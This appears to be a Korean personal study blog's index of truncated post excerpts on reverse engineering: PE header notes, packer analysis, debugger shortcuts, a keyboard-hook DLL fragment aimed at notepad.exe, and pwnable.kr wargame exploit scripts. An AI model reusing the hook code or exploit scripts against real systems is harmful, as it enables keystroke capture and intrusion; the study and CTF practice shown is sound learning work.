대충공부한거적어두는블로그

// KeyHook.dll #include "stdio.h" #include "windows.h" #define DEF_PROCESS_NAME "notepad.exe" HINSTANCE g_hInstance = NULL; // hook procedure가 속한 DLL 핸들 HHOOK g_hHook = NULL; // Hook 핸들 HWND g_hWnd = NULL; BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpvReserved) { switch(dwReason) { case DLL_PROCESS_ATTACH: g_hInstance = hinstDll; break; case DLL_PROCESS_DETACH: break; } retur..

[코드 흐름 분석] 0x401000 (EP) // not encoded ↓ 0x4010E9 // not encoded ↓ 0x401098 // not encoded 디코딩 루프 존재 : 0x4010F5 - 0x401248 xor with 0x44 ↓ 0x4010BD // not encoded 디코딩 루프 존재: 0x401007 - 0x401085 xor with 0x7 디코딩 루프 존재: 0x4010F5 - 0x401248 xor with 0x11 ↓ 0x401039 // xor 7에 의해 decoded 된 상태 checksum 계산 (0x4010F5 - 0x401248 변조 여부 확인) ↓ 0x40108A // not encoded 디코딩 루프 존재: 0x40124A - 0x40127F xor with..

* PEView는 여전히 Upack 패킹된 파일 분석 못한다... IMAGE_DOS_HEADER [ 0x0 ~ 0x3F ] - "MZ" 시그니쳐 - e_lfanew = 0x10 - 0x2 ~ 0x3B까지는 다른 용도로 쓰인다 DOS Stub 생략 PE Signature [ 0x10 ~ 0x13 ] IMAGE_FILE_HEADER [ 0x14 ~ 0x27 ] - Machine 0x14C, 섹션 수 3개 - Optional Header Size 0x148 => 0xE0보다 크다, 남은 공간은 다른 용도로 쓴다 IMAGE_OPTIONAL_HEADER [ 0x28 ~ 0x16F ] - magic number 0x10B, RVA of EP = 0x1018 - Image Base=0x1000000, Section ..

[Base Relocation Table] Base Relocation Table 주소 = IMAGE_OPTIONAL_HEADER32.DataDirectory[6] 통해 구함 .reloc 섹션에 존재한다 // Relocation Table (구조체 + WORD 타입 배열) // RVA=1000 단위로 블록 하나씩 추가됨 typedef struct _IMAGE_BASE_RELOCATION { DWORD VirtualAddress; // RVA DWORD SizeOfBlock; // Size of Relocation Table } IMAGE_BASE_RELOCATION; WORD TypeOffset[N]; // N = (SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION))/2 Ty..

upx -o notepad_upx.exe notepad.exe 이렇게 하면 안 열림 This has to do with resource compression; the "MUI" resource somehow does not get uncompressed correctly which causes LoadStringW to fail, regardless of .mui files being present or not. This in turn causes notepad to bail (nice error handling...). If you compress with upx --compress-resources=0 you'll see that it works. upx --compress-resources=0 -o..

http://www.phreedom.org/research/tinype/ Tiny PE Tiny PE Translations: português brasileiro Creating the smallest possible PE executable This work was inspired by the Tiny PE challenge by Gil Dabah. The object of the challenge was to write the smallest PE file that downloads a file from the Internet and www.phreedom.org [97Byte PE] - IMAGE_DOS_HEADER [0x00 ~ 0x3F] 1) e_magic = "MZ", DOS 시그니쳐 존재 ..

[PE Header 구조] - IMAGE_DOS_HEADER [크기 0x40] 0x0~0x1 : DOS Signature "MZ(4D5A)" 0x3C~0x3F : NT header의 offset - DOS Stub [DOS_HEADER 이후부터 NT header offset 전까지] 0x0~0xD : 16bit DOS용 어셈블리 0xE ~ : 문자열 - IMAGE_NT_HEADERS 1) PE Signature ("PE\x00\x00") [크기 0x4] 2) IMAGE_FILE_HEADER [크기 0x14] 0x0~0x1 : Machine (0x014c: Intel 386, 0x0200: Intel 64) 0x2~0x3 : Number of sections (>0) 0x10~0x11 : Size of O..

명령어 단축키 설명 restart Ctrl + F2 처음부터 다시 디버깅 시작 step into F7 OP 코드 하나 실행, CALL 명령 내부로 step over F8 OP 코드 하나 실행, CALL 명령 넘어감 execute until return Ctrl + F9 함수 코그 내에서 RETN 명령까지 실행 go to Ctrl + G 원하는 주소로 jump execute until cursor F4 커서 위치까지 실행 comment : 코멘트 추가 Search for - User-defined comment label ; 라벨 추가 Search for - User-defined label set/reset bp F2 bp 추가 / 제거 run F9 실행 show current EIP * 현재 EIP 위..

import subprocess subprocess.Popen(["/home/otp/otp", "0"]) otp@pwnable:~$ ulimit -f 0 otp@pwnable:~$ python Python 2.7.12 (default, Mar 1 2021, 11:38:31) [GCC 5.4.0 20160609] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import subprocess >>> subprocess.Popen(["./otp", "0"]) #include #include #include #include int main(int argc, char* argv[]){ char fname[12..

from pwn import * # p = process("./dragon") p = remote("pwnable.kr", 9004) def ssc(): # Priest: HolyShield - HolyShield - Clarity # Priest's HP -= 10 , Dragon's HP += 12 p.sendlineafter("Invincible.\n", "3") p.sendlineafter("Invincible.\n", "3") p.sendlineafter("Invincible.\n", "2") # don't attack baby dragon p.sendlineafter("[ 2 ] Knight\n", "1") p.sendlineafter("Invincible.\n", "1") p.sendline..